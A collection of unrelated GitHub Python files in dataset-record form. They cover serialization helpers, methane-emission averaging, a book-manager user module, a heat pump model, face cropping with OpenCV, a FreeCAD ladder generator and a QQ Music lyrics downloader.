io\n\nAVAILABLE_PROTOCOLS = ['auto', 'pickle', 'json', 'jsongz', 'bytes',\n 'bytesgz']\n\n\ndef _to_gzip(value):\n out = io.BytesIO()\n _ = gzip.GzipFile(fileobj=out, mode='wb').write(value)\n return out.getvalue()\n\n\ndef _from_gzip(value):\n return gzip.GzipFile(fileobj=io.BytesIO(value), mode='rb').read()\n\n\ndef _obj_to_pkl_string(o):\n return _dumps(o, protocol=_hp)\n\n\nclass MarshalHandler(object):\n\n PICKLE_IDENTIFIER = b'PKL||'\n JSON_IDENTIFIER = b'JSN||'\n JSONGZ_IDENTIFIER = b'JSNGZ||'\n BYTES_IDENTIFIER = b'BYT||'\n BYTESGZ_IDENTIFIER = b'BYTGZ||'\n\n PROTOCOL_MAP = {\n PICKLE_IDENTIFIER: 'pickle',\n JSON_IDENTIFIER: 'json',\n JSONGZ_IDENTIFIER: 'jsongz',\n BYTES_IDENTIFIER: 'bytes',\n BYTESGZ_IDENTIFIER: 'bytesgz'\n }\n\n def __init__(self):\n self._protocol = 'auto'\n\n self.FWD_PROJ_EXPR = {\n 'pickle': self._marshal_pickle,\n 'json': self._marshal_json,\n 'jsongz': partial(self._marshal_json, as_gzip=True),\n 'bytes': self._marshal_bytes,\n 'bytesgz': partial(self._marshal_bytes, as_gzip=True),\n }\n\n self.BWD_PROJ_EXPR = {\n 'pickle': self._unmarshal_pickle,\n 'json': self._unmarshal_json,\n 'jsongz': self._unmarshal_json,\n 'bytes': self._unmarshal_bytes,\n 'bytesgz': self._unmarshal_bytes\n }\n\n @staticmethod\n def get_protocol(buf):\n if buf.startswith(b'r'):\n buf = buf[1:]\n return MarshalHandler.PROTOCOL_MAP[buf.split(b'||')[0] + b'||']\n\n @property\n def protocol(self):\n return self._protocol\n\n @protocol.setter\n def protocol(self, value):\n if value not in AVAILABLE_PROTOCOLS:\n raise ValueError('{} not a valid protocol'.format(value))\n self._protocol = value\n\n def _marshal_json(self, obj, as_gzip=False):\n try:\n buf = bytes(_obj_to_json_string(obj), 'utf-8')\n # buf = _obj_to_json_string(obj)\n except TypeError as e:\n raise TypeError('Object of class <{}> is not JSON '\n 'serializable'.format(type(obj)))\n if as_gzip:\n return self.JSONGZ_IDENTIFIER + _to_gzip(buf)\n return self.JSON_IDENTIFIER + buf\n\n def _marshal_bytes(self, obj, as_gzip=False):\n prepad = b''\n try:\n if isinstance(obj, bytes):\n buf = bytes(obj)\n prepad = b'r'\n elif isinstance(obj, str):\n buf = bytes(obj, 'utf-8')\n else:\n raise TypeError()\n except TypeError as e:\n raise TypeError('Object of class <{}> is not serializable by raw '\n 'bytes'.format(type(obj)))\n if as_gzip:\n return prepad + self.BYTESGZ_IDENTIFIER + _to_gzip(buf)\n return prepad + self.BYTES_IDENTIFIER + buf\n\n def _marshal_pickle(self, obj):\n try:\n buf = _obj_to_pkl_string(obj)\n except (TypeError, PicklingError, AttributeError):\n raise TypeError('Object of class {} is not '\n 'pickle-able'.format(type(obj)))\n return self.PICKLE_IDENTIFIER + buf\n\n def _unmarshal_json(self, buf):\n\n if buf.startswith(self.JSON_IDENTIFIER):\n return _obj_from_json_string(str(\n buf.replace(self.JSON_IDENTIFIER, b''), 'utf-8'\n ))\n\n if buf.startswith(self.JSONGZ_IDENTIFIER):\n return _obj_from_json_string(str(\n _from_gzip(buf.replace(self.JSONGZ_IDENTIFIER, b'')), 'utf-8'\n ))\n\n raise ValueError('Cannot unmarshal with JSON protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def _unmarshal_bytes(self, buf):\n prjexpr = lambda x: str(x, 'utf-8')\n if buf.startswith(b'r'):\n buf = buf[1:]\n prjexpr = lambda x: x\n if buf.startswith(self.BYTES_IDENTIFIER):\n return prjexpr(buf.replace(self.BYTES_IDENTIFIER, b''))\n if buf.startswith(self.BYTESGZ_IDENTIFIER):\n return prjexpr(_from_gzip(buf.replace(\n self.BYTESGZ_IDENTIFIER, b''\n )))\n\n raise ValueError('Cannot unmarshal with raw bytes protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def _unmarshal_pickle(self, buf):\n if buf.startswith(self.PICKLE_IDENTIFIER):\n return _obj_from_pkl_string(buf.replace(\n self.PICKLE_IDENTIFIER, b''\n ))\n\n raise ValueError('Cannot unmarshal with raw bytes protocol when '\n 'identifier is of '\n 'type <{}>'.format(self.get_protocol(buf)))\n\n def marshal(self, blob, override=None, ensure_immutable=False):\n if ensure_immutable:\n try:\n _ = hash(blob)\n except TypeError as e:\n raise TypeError(\n 'Unhashable type found: <{}>'.format(type(blob)))\n if override is not None:\n old_protocol = self._protocol\n self._protocol = override\n if self._protocol == 'auto':\n if override is not None:\n self._protocol = old_protocol\n if isinstance(blob, str) or isinstance(blob, bytes):\n return self._marshal_bytes(blob)\n try:\n return self._marshal_json(blob)\n except TypeError:\n return self._marshal_pickle(blob)\n retrieved = self.FWD_PROJ_EXPR[self._protocol](blob)\n if override is not None:\n self._protocol = old_protocol\n return retrieved\n\n def unmarshal(self, buf, **kwargs):\n if buf is None:\n return None\n return self.BWD_PROJ_EXPR[self.get_protocol(buf)](buf, **kwargs)\n","repo_name":"Python3pkg/Cupboard","sub_path":"cupboard/marshal.py","file_name":"marshal.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1175308049","text":"from CH4Avg.utils.dev_unbalanced import (barycenter_unbalanced_sinkhorn2D,\n barycenter_unbalanced_sinkhorn2D_wind)\nfrom CH4Avg.utils.cost_matrices import CostMtx\nfrom CH4Avg.utils.preprocessing import load_data, preprocess\nimport ot\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nbasepath = '../data/permian_wind_reprojected/'\n\n(A, dimx, dimy, wind, y_over_x_ratio) = load_data(\n basepath, quality_thr=1, iswind=(3, 4))\nA = preprocess(A[:, :], normalize=(lambda x: x/np.nanmean(x)))\nTot = preprocess(A, to_2D=(dimx, dimy))\n\n# M is of shape shape dimx / dimy ^ 4\nM = CostMtx(dimx, dimy, y_over_x_ratio=y_over_x_ratio)\n# Same as M above, but separable (hence much faster)\n# Cx of shape dimx ^ 2\n(Cx, Cy) = CostMtx(dimx, dimy, y_over_x_ratio=y_over_x_ratio, separable=True)\n\n# For 2D with wind\n(Cxs, Cys) = (np.zeros((Cx.shape[0], Cx.shape[0], Tot.shape[2])), np.zeros(\n (Cy.shape[0], Cy.shape[0], Tot.shape[2])))\n\n# negative because we want to \"reverse\" the effect of the wind\nwind_factor = 5\nfor i in range(Tot.shape[2]):\n (Cxs[:, :, i], Cys[:, :, i]) = CostMtx(\n dimx, dimy, y_over_x_ratio=y_over_x_ratio,\n separable=True, wind=wind[:, i],\n wind_factor=wind_factor, cost=\"wind_new\")\n\nreg = 0.0025\nreg_m = 0.5\n\nGtest = ot.barycenter_unbalanced(\n A.T, M, reg, reg_m, method=\"sinkhorn_stabilized\",\n stopThr=1e-4, log=True, verbose=True, tau=1e18)\nstart_time = time.time()\nG2D = barycenter_unbalanced_sinkhorn2D(\n Tot, Cx, Cy, reg, reg_m, weights=None,\n numItermax=300, stopThr=1e-4, verbose=True,\n log=True, logspace=False, reg_K=1e-16)\nprint(time.time()-start_time)\nG2Dw = barycenter_unbalanced_sinkhorn2D_wind(\n Tot, Cxs, Cys, reg, reg_m, weights=None, numItermax=300,\n stopThr=1e-4, verbose=True, log=True, logspace=False, reg_K=1e-16)\n# %%\ncm = 'OrRd'\nax1 = plt.subplot(141)\nplt.imshow(Tot.mean(axis=2), cmap=cm)\nplt.title(\"arithmetic mean\")\nax1 = plt.subplot(142)\nplt.imshow(Gtest[0].reshape((dimx, dimy)), cmap=cm)\nplt.title(\"POT 1D Wasserstein\")\nax1 = plt.subplot(143)\nplt.imshow(G2D[0], cmap=cm)\nplt.title(\"2D Wasserstein\")\nax1 = plt.subplot(144)\nplt.imshow(G2Dw[0], cmap=cm)\nplt.title(\"2D Wasserstein + wind\")\nplt.show()\n# %%\n","repo_name":"mathbarre/EmissionsAveraging","sub_path":"CH4Avg/examples/barycenter_sentinelS5P.py","file_name":"barycenter_sentinelS5P.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74490256166","text":"\"\"\"\nProject name: BOOK MANAGER\nAuthor: MENIN THIBAUT & KOCOGLU LUCAS\nDesc: This file is store functions of manage readers.\n\"\"\"\n\n######### MODULES / IMPORT #############\n\nfrom manage_system.manage_files import read_file, write_file\nfrom manage_system.manage_bookreaders import add_bookreader, remove_bookreader\nfrom manage_system.manage_book import del_indice\nfrom manage_system.utilities_func import *\n\nfrom suggestions.updater_matrix import update_rating_matrix, update_suggest_matrix\nfrom suggestions.manage_review import get_review_book\n\n######### MODULES / IMPORT #############\n\n######### SETTINGS #############\n\nfrom config import language\nif language == \"fr\":\n from languages.language_fr import *\nelif language == \"en\":\n from languages.language_en import *\n\n######### SETTINGS #############\n\n######### FUNCTIONS #############\n\ndef add_user():\n \"\"\"\n Add user in the file ./data/readers.txt and updates others data file\n \"\"\"\n\n print(text_add_user_separator)\n\n # Entrée utilisateur\n\n username, gender, age, preferences = ask_username(), ask_gender(), ask_age(), ask_preferences()\n temp = [username, gender, age, preferences]\n\n # Auto-update function : reader, bookreader, rating_matrix\n add_bookreader(username)\n write_file(\"readers_add\", temp)\n update_rating_matrix(\"add_user\", None)\n update_suggest_matrix(\"add_user\", None)\n\n return True\n\n\ndef remove_user(username=\"\"):\n \"\"\"\n Delete user in the file ./data/readers.txt and updates others data file\n \"\"\"\n\n # Import de la liste data\n data = read_file(\"readers\")\n\n while user_exist(username) is False:\n username = str(input(text_remove_user_input))\n if username in [\"exit\", \"Exit\", \"EXIT\", \"exit()\", \"Exit()\"]:\n return False\n\n print(text_remove_user_warning) \n while True:\n confirm = str(input(text_remove_user_warning_confirm))\n if confirm in [\"Yes\", \"yes\", \"y\", \"Y\", \"YES\", \"oui\", \"Oui\", \"o\", \"OUI\", \"O\"]:\n i = 0\n while (i < len(data)) and (data[i][0] != username):\n i += 1\n\n # Cas où l'utilisateur ne figure pas dans la base car i > len(data)\n if i > len(data):\n return False\n # Cas où l'utilisateur figure dans la base\n else:\n data.pop(i) # or del data[i]\n write_file(\"readers\", data)\n remove_bookreader(username)\n update_rating_matrix(\"remove_user\", i)\n update_suggest_matrix(\"remove_user\", i)\n quit() # Built-in function to exit the program\n elif confirm in [\"No\", \"no\", \"n\", \"N\", \"NO\", \"Non\", \"non\", \"NON\"]:\n return False\n\n\ndef user_exist(username):\n \"\"\"\n Verify if user exist in ./data/readers.txt\n \"\"\"\n\n # Import de la liste data\n data = read_file(\"readers\")\n\n for i in data:\n if i[0] == username:\n return True\n return False\n\n\ndef show_users(command=0):\n \"\"\"\n Show all user by their username ./data/readers.txt\n If the len exceed 15, divide into pages.\n \"\"\"\n data = read_file(\"readers\")\n\n nbdanspages = 15\n\n if len(data) <= nbdanspages:\n print(text_show_users_separator_1 + str(len(data)) + \" \" + text_show_users_separator_2)\n for i in range(len(data)):\n print(data[i][0])\n print(text_show_users_separator)\n else:\n pages = len(data) // nbdanspages\n page = 0\n\n while command != 3:\n\n if (page + 1) * nbdanspages > len(data):\n borne_a, borne_b = page * nbdanspages, len(data)\n else:\n borne_a, borne_b = page * nbdanspages, (page + 1) * nbdanspages\n\n print(text_show_users_separator_3 + \" \" + str(page + 1) + \"/\" + str(pages + 1) + text_show_users_separator_4)\n for i in range(borne_a, borne_b): # vérifier la relation entre page actuel et\n print(data[i][0])\n print(text_show_users_separator_3 + \" \" + str(page + 1) + \"/\" + str(pages + 1) + text_show_users_separator_4)\n\n if page == 0:\n commandes = {2: \"Page suivante\", 3: \"Exit\"}\n print(text_show_users_commands_1)\n elif page == pages:\n commandes = {1: \"Page précédente\", 3: \"Exit\"}\n print(text_show_users_commands_2)\n else:\n commandes = {1: \"Page précédente\", 2: \"Page suivante\", 3: \"Exit\"}\n print(text_show_users_commands_3)\n try:\n command = int(input(\"Your input : \"))\n except ValueError:\n pass\n\n if command not in commandes:\n pass\n elif command == 1:\n page -= 1\n elif command == 2:\n page += 1\n elif command == 3:\n return True\n\n return True\n\n\ndef modify_user(username=\"\", command=0):\n \"\"\"\n Menu manage user data in ./data/readers.txt\n \n Commandes : \n 1. Gender\n 2. Age\n 3. Preferences\n 4. Back to parent menu\n \"\"\"\n data = read_file(\"readers\")\n\n print(text_modify_user_separator)\n print(text_modify_user_input_request)\n while user_exist(username) is False:\n username = str(input(text_modify_user_input))\n\n # Index user in data\n\n index = position(data, username)\n\n commandes = {1: \"gender\", 2: \"age\", 3: \"preferences\", 4: \"back to main menu\"}\n\n print(text_modify_user_command)\n while command != 4:\n try:\n command = int(input(text_modify_user_input))\n except ValueError:\n pass\n\n if command not in commandes:\n pass\n\n elif command == 1:\n data[index][1] = ask_gender()\n print(text_modify_user_command)\n\n elif command == 2:\n data[index][2] = ask_age()\n print(text_modify_user_command)\n\n elif command == 3:\n data[index][3] = ask_preferences()\n print(text_modify_user_command)\n\n elif command == 4:\n pass\n\n write_file(\"readers\", data)\n return True\n\n\ndef show_profile(username=\"\"):\n \"\"\"\n Show profil of logged user # à modifier en username donné en input\n Show:\n username\n gender\n age\n preference\n list of books\n if user has no book readed:\n show: no books readed yet\n else:\n name of book (grade/5) + ...\n \"\"\"\n\n data_readers = read_file(\"readers\")\n data_bookreaders = read_file(\"booksread\")\n data_book = read_file(\"books\")\n\n while user_exist(username) is False:\n username = str(input(text_show_user_input))\n\n for i in data_readers:\n for j in i:\n if username == j:\n print(text_show_user_separator)\n print(text_show_user_username + str(i[0]))\n if i[1] == '1':\n print(text_show_user_gender_1)\n elif i[1] == '2':\n print(text_show_user_gender_2)\n elif i[1] == '3':\n print(text_show_user_gender_3)\n if i[2] == '1':\n print(text_show_user_age_1)\n elif i[2] == '2':\n print(text_show_user_age_2)\n elif i[2] == '3':\n print(text_show_user_age_3)\n if i[3] == '1':\n print(text_show_user_preference_1)\n elif i[3] == '2':\n print(text_show_user_preference_2)\n elif i[3] == '3':\n print(text_show_user_preference_3)\n elif i[3] == '4':\n print(text_show_user_preference_4)\n elif i[3] == '5':\n print(text_show_user_preference_5)\n elif i[3] == '6':\n print(text_show_user_preference_6)\n elif i[3] == '7':\n print(text_show_user_preference_7)\n print(text_show_user_books_readed, end=\"\")\n temp = []\n for i in data_bookreaders:\n if i[0] == username:\n for j in i[1:]:\n temp.append(j)\n data_book = del_indice(data_book)\n if temp == []:\n print(text_show_user_books_no_book_readed_yet)\n else:\n for i in temp:\n print(data_book[int(i)-1] + \" (\" + text_show_user_books_note + \" : \" + str(get_review_book(username, position(data_readers, username), int(i))) + \"/5)\", end=\" ; \")\n print(\"\\n\" + text_show_user_separator)\n return True\n return False\n\n######### FUNCTIONS #############\n\n","repo_name":"ItsLucas93/Projet-L1-S1","sub_path":"manage_system/manage_readers.py","file_name":"manage_readers.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3000551125","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 19 16:45:15 2015\n\n@author: tsz\n\"\"\"\n\nfrom __future__ import division\n\nimport pycity_base.classes.supply.heating_device as HeatingDevice\nimport numpy as np\nfrom pycity_base.functions import handle_data as handleData\n\n\nclass Heatpump(HeatingDevice.HeatingDevice):\n \"\"\"\n Implementation of the heat pump.\n \"\"\"\n \n def __init__(self, environment, \n t_ambient, t_flow,\n heat, power, cop,\n t_max, lower_activation_limit=1):\n \"\"\"\n Parameters\n ----------\n environment : environment object\n Common to all other objects. Includes time and weather instances.\n t_ambient : array-like\n Outdoor ambient air temperature\n t_flow : array-like\n Heat pump's flow temperature\n heat : array-like (2 dimensional)\n Heat pump's heat power\n power : array-like (2 dimensional)\n Heat pump's electrical power\n cop : array-like (2 dimensional)\n Heat pump's coefficient of performance (cop)\n t_max : float\n Heat pump's nominal temperature\n lower_activation_limit : float (0 <= lower_activation_limit <= 1)\n Define the lower activation limit. For example, heat pumps are \n typically able to operate between 50 % part load and rated load. \n In this case, lower_activation_limit would be 0.5\n Two special cases: \n Linear behavior: lower_activation_limit = 0\n Two-point controlled: lower_activation_limit = 1\n \"\"\"\n \n q_nominal=np.zeros(environment.timer.timesteps_horizon)\n super(Heatpump, self).__init__(environment, \n q_nominal,\n t_max,\n lower_activation_limit)\n self._kind = \"heatpump\"\n \n self.t_ambient = t_ambient\n self.t_flow = t_flow\n self.heat = heat\n self.power = power\n self.cop = cop\n \n timesteps_total = environment.timer.timesteps_total\n timesteps_used_horizon = environment.timer.timesteps_used_horizon\n self.total_p_consumption = np.zeros(timesteps_total)\n self.current_p_consumption = np.zeros(timesteps_used_horizon)\n\n @property\n def kind(self):\n return self._kind\n \n def getNominalValues(self, t_flow):\n \"\"\"\n Return the nominal electricity consumption, heat output and lower \n activation limit.\n \n The electricity consumption and heat output are computed by two \n dimensional interpolation with the ambient temperature and required\n flow temperature as well as the heat pump's characteristics.\n \n Parameters\n ----------\n t_flow : array-like\n Required flow temperature\n \n Returns\n -------\n p_nominal : array-like\n Nominal electricity consumption at the given flow temperatures and\n the forecast of the current ambient temperature\n q_nominal : array-like\n Nominal heat output at the given flow temperatures and the \n forecast of the current ambient temperature\n t_max : float\n Maximum flow temperature that can be provided by the heat pump\n lower_activation_limit : float (0 <= lower_activation_limit <= 1)\n Define the lower activation limit. For example, heat pumps are \n typically able to operate between 50 % part load and rated load. \n In this case, lower_activation_limit would be 0.5\n Two special cases: \n Linear behavior: lower_activation_limit = 0\n Two-point controlled: lower_activation_limit = 1\n \n Examples\n --------\n >>> t_flow = building.getFlowTemperature()\n >>> (p_nominal, q_nominal, lower_activation_limit) = hp.getNominals(t_flow)\n \"\"\"\n # Get weather forecast\n weatherForecast = self.environment.weather.getWeatherForecast\n (t_ambient,) = weatherForecast(getTAmbient=True)\n \n # Two dimensional interpolation is required.\n # Initialize temporary results of the first interpolation\n timesteps_horizon = self.environment.timer.timesteps_horizon\n heat = np.zeros((timesteps_horizon, len(self.t_flow)))\n power = np.zeros((timesteps_horizon, len(self.t_flow)))\n \n # Compute first interpolation\n for i in range(len(self.t_flow)):\n heat[:,i] = np.interp(t_ambient, self.t_ambient, self.heat[:,i])\n power[:,i] = np.interp(t_ambient, self.t_ambient, self.power[:,i])\n \n # Initialize final results\n heatNominal = np.zeros(timesteps_horizon)\n powerNominal = np.zeros(timesteps_horizon)\n for j in range(timesteps_horizon):\n heatNominal[j] = np.interp(t_flow[j], self.t_flow, heat[j,:])\n powerNominal[j] = np.interp(t_flow[j], self.t_flow, power[j,:])\n \n # Return results\n return (powerNominal, heatNominal, \n self.t_max, self.lower_activation_limit)\n \n def getResults(self, currentValues=True):\n \"\"\"\n Return results.\n \n Parameters\n ----------\n currentValues : boolean, optional\n - True : Return only values for this scheduling period\n - False : Return values for all scheduling periods\n \n Returns\n -------\n pConsumption : array-like\n Electricity consumption of the heat pump\n qOutput : array-like\n Heat production of the heat pump\n schedule : array-like\n Operational schedule\n \"\"\"\n pConsumption = handleData.getValues(currentValues, \n self.current_p_consumption,\n self.total_p_consumption)\n \n return (pConsumption,\n self._getQOutput(currentValues), \n self._getSchedule(currentValues))\n\n def setResults(self, pConsumption, qOutput, schedule):\n \"\"\"\n Save resulting electricty consumption, heat output and \n operational schedule.\n \"\"\"\n self._setSchedule(schedule)\n self._setQOutput(qOutput)\n result = handleData.saveResult(self.environment.timer, \n self.current_p_consumption,\n self.total_p_consumption,\n pConsumption)\n (self.current_p_consumption, self.total_p_consumption) = result\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/classes/supply/heat_pump.py","file_name":"heat_pump.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"31861458906","text":"from checkFile import checkFile\nfrom summaryReport import summaryReport\nfrom vocReport import promoterReport\n\ndef createReport(path):\n\n filename = path.split(\"\\\\\")[1]\n if checkFile(path):\n # summary = summaryReport(path)\n # promoters = promoterReport(path)\n print(filename)\n\n # with open(\"Key_Data_{}.txt\".format(), \"a\") as lst_file:\n # lst_file.writelines(summary)\n # lst_file.writelines(promoters)\n # lst_file.close() \n\n with open(\"file.lst\", \"a\") as lst_file:\n lst_file.writelines(\"\\n\" + filename)\n lst_file.close()\n\n\npath = 'MonthlyReports\\expedia_report_monthly_march_2018.xlsx'\ncreateReport(path)","repo_name":"hzeig/Smoothstack","sub_path":"monthly_reports_requests_project/createReport.py","file_name":"createReport.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217402146","text":"wolfs = set(\"w\" * i + \"o\" * i + \"l\" * i + \"f\" * i for i in range(1, 13))\n\n\nline = input()\nindex = 0\nwhile index < len(line):\n flag = False\n for w in wolfs:\n if line[index:].startswith(w):\n index += len(w)\n flag = True\n if not flag:\n break\n\nprint(1 if index == len(line) else 0)\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob13022.py","file_name":"prob13022.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011000092","text":"from skimage.io import imread, imshow\nfrom skimage.transform import resize\nfrom skimage.feature import hog\nfrom skimage import exposure\nimport matplotlib.pyplot as plt\nimport sys\nimport cv2\nimport os\nimport numpy as np\nimport ntpath\n\n\n\nCASCADE_PATH = \"fr_env/lib/python3.8/site-packages/cv2/data/haarcascade_frontalface_default.xml\"\n\ndef display_image(img):\n plt.imshow(img)\n plt.show()\n\ndef path_leaf(path):\n head, tail = ntpath.split(path)\n return tail or ntpath.basename(head)\n\n\n\n\n\n\n\nif len(sys.argv) < 2:\n print(\"no input image\")\n exit(1)\nif len(sys.argv) < 3:\n print(\"no output folder\")\n exit(1)\nop_path = sys.argv[2]\nprint(sys.argv[1])\nraw_img = cv2.imread(sys.argv[1])\nprint(raw_img.shape)\nimg = cv2.cvtColor(raw_img, cv2.COLOR_BGR2GRAY)\nprint(img.shape)\n\n# resized_img = resize(img,(1000,1000))\nresized_img =img\nprint(resized_img.shape)\n# display_image(resized_img)\n\n\nface_classifier = cv2.CascadeClassifier(CASCADE_PATH)\n\n# resized_img = np.array(resized_img, dtype='uint8')\nfaces = face_classifier.detectMultiScale(resized_img, 1.3,3) ### (inp_img, scaling_factor, minNeighbours )\nprint(len(faces))\nif len(faces) == 0:\n print(\"No faces found\")\nind = 0\nfor (x,y,w,h) in faces:\n cv2.rectangle(resized_img, (x,y), (x+w,y+h), (127,0,255), 2 )\n cropped = resized_img[y:y+h, x:x+w]\n # cv2.imshow('Face', cropped)\n cv2.imwrite( op_path + \"/faceof_\"+str(ind)+path_leaf(sys.argv[1]),cropped)\n # print(\"***\", op_path, op_path + \"/faceof_\"+str(ind)+path_leaf(sys.argv[1]))\n ind+=1\n # cv2.waitKey(0)\n\ncv2.destroyAllWindows()","repo_name":"jha11aditya/facial_recognition","sub_path":"face_cutter.py","file_name":"face_cutter.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20793435012","text":"import numpy as np\nfrom FreeCAD import Placement, Vector, Rotation\nimport Draft\n \ndoc = App.ActiveDocument\n\n\ndef get_box(dims=[1, 1, 1], shift=[0, 0, 0]):\n box = doc.addObject(\"Part::Box\",\"Box\")\n box.Placement.move(Vector(shift))\n box.Length, box.Width, box.Height = dims\n return box\n\n\ndef get_L(length, width, thickness, left=True, shift=[0, 0, 0]):\n shift = np.array(shift)\n box1 = get_box([length, width, width], shift = shift)\n if left:\n shift2 = shift + np.array([0, thickness, thickness])\n else:\n shift2 = shift + np.array([0, -thickness, thickness])\n box2 = get_box([length, width, width], shift = shift2) \n cut = doc.addObject(\"Part::Cut\",\"Cut\")\n cut.Base = box1\n cut.Tool = box2\n return cut\n\ndef get_rails(length, thickness, width, distance, shift=[0,0,0]):\n shift = np.array(shift)\n left = get_L(length, width, thickness, shift = shift)\n shift = shift + [0, distance - width, 0]\n right = get_L(length, width, thickness, shift=shift, left=False)\n return (left, right)\n\n#get_rails(length = 3887, thickness = 5, width = 50, distance=1610)\n\ndef make_steps(rail_dist, step_rail_gap, step_diam, first_step, padding,\n L_thickness, n_steps, step_dist):\n step_length = rail_dist - 2*L_thickness - 2 * step_rail_gap\n cyl = doc.addObject(\"Part::Cylinder\",\"Cylinder\")\n cyl.Height = step_length\n cyl.Radius = step_diam / 2\n shift = [first_step, (rail_dist - step_length) / 2,\n step_diam / 2 + padding + L_thickness]\n cyl.Placement = Placement(Vector(shift), Rotation(Vector(1, 0, 0), -90))\n \n obj = Draft.makeArray(cyl,Vector(step_dist,0,0),Vector(0,1,0),n_steps, 1)\n Draft.autogroup(obj)\n return obj\n\n##make_steps(\n## rail_dist = 1610,\n## step_rail_gap = 10,\n## step_diam = 30,\n## first_step = 100,\n## padding = 1,\n## L_thickness = 5,\n## n_steps = 10,\n## step_dist = 300,\n##)\n\n\ndef get_ladder(length, rail_dist, step_rail_gap, step_diam, first_step,\n padding,L_thickness, L_width, step_dist):\n rails = get_rails(length=length, thickness=L_thickness,\n width=L_width, distance=rail_dist)\n n_steps = (length - first_step) // step_dist + 1\n steps = make_steps(\n rail_dist=rail_dist, step_rail_gap=step_rail_gap,\n step_diam=step_diam,\n first_step=first_step,\n padding=padding,\n L_thickness=L_thickness,\n n_steps=n_steps,\n step_dist=step_dist,\n )\n return rails, steps\n\n\n\nget_ladder(\n length = 3887,\n rail_dist = 1610,\n step_rail_gap = 10,\n step_diam = 30,\n first_step = 100,\n padding = 1,\n L_thickness = 5,\n L_width = 50,\n step_dist = 300,\n)\n","repo_name":"PistaSaki/hrazda","sub_path":"drawings/hrazda.py","file_name":"hrazda.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19170496103","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : tanke\n@Time : 2020/7/1 15:51\n\"\"\"\n\nimport os\nimport requests\nimport json\nfrom requests.adapters import HTTPAdapter\nimport time\nimport sys\nimport threading\nimport math\nfrom threading import Thread\nimport opencc\nimport base64\nfrom html.parser import HTMLParser\nimport html\nimport taglib\n\nimport os\n\nlrc_suffix = \"lrc\"\n\n\ndef lrc_QQ(title, artist):\n song_name = str(title.encode('utf-8'))\n song_name = song_name.replace('\\\\x', '%')[:-1]\n song_name = song_name[2:]\n\n url = 'https://c.y.qq.com/soso/fcgi-bin/client_search_cp?aggr=1&cr=1&flag_qc=0&p=1&n=15&w=' + song_name\n\n res = requests.get(url)\n response = json.loads(res.text.replace('callback(', '')[:-1])['data']['song']['list']\n song_ns = []\n singer_li = []\n for index, i in enumerate(response):\n singer_n = []\n for x in i['singer']:\n singer_n.append(x['name'])\n song_ns.append((index, '歌名: {}\\n'.format(i['songname']) + '歌手: ' + ' & '.join(singer_n) + '\\n'))\n\n out = -1\n\n for index, i in enumerate(song_ns):\n print(\"{}: {}\".format(index+1, i[1]))\n choice = int(input('请输入歌曲编号,不是输入0: ')) - 1\n if 0 <= choice < len(i):\n out = choice\n else:\n return None\n mid = response[out]['songmid']\n for i in response[out]['singer']:\n singer_li.append(i['name'])\n url = 'https://c.y.qq.com/lyric/fcgi-bin/fcg_query_lyric_yqq.fcg?nobase64=1&musicid={}&-=jsonp1&g_tk=5381&loginUin=0&hostUin=0&format=json&inCharset=utf8&outCharset=utf-8¬ice=0&platform=yqq.json&needNewCode=0'.format(\n response[out]['songid'])\n headers = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Origin': 'https://y.qq.com',\n 'Referer': 'https://y.qq.com/n/yqq/song/' + mid + '.html',\n # 'User-Agent':' Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n }\n res = requests.get(url, headers=headers) #\n h = HTMLParser()\n return html.unescape(res.json()['lyric'])\n\n\n\ndef scan_dictionary(path):\n files = os.listdir(path)\n for file in files:\n if not os.path.isdir(file):\n filename, type = os.path.splitext(file)\n if not os.path.exists(\"{}/{}.{}\".format(path, filename, lrc_suffix)):\n song = taglib.File('{}/{}'.format(path, file))\n if 'TITLE' in song.tags and len(song.tags['TITLE']) > 0:\n title = song.tags['TITLE'][0]\n else:\n title = filename\n if 'ARTIST' in song.tags and len(song.tags['ARTIST']) > 0:\n artist = song.tags['ARTIST'][0]\n else:\n artist = \"\"\n content = lrc_QQ(title, artist)\n if content == None:\n pass\n else:\n with open('{}/{}.{}'.format(path, filename, lrc_suffix), 'w', encoding='utf-8') as f:\n f.write(content)\n\n\n\nif __name__ == \"__main__\":\n scan_dictionary(\"D:\\\\music\")\n\n\n# print('''\n# 本工具目前支持网易云和QQ音乐歌词下载\n# 更新请移步 https://github.com/gongxi-cn-ln-dl/QQmusic-Lrc_downloader\n# 感谢使用!''')\n# time.sleep(3)\n# os.system('cls')\n# cho = input('''\n# 请选择播放器\n# 1.网易云音乐\n# 2.QQ音乐''')\n# if cho == '1':\n# lrc_163(input('请输入歌名: '))\n# elif cho == '2':\n# lrc_QQ(input('请输入歌名: '), 'song')\n# else:\n# 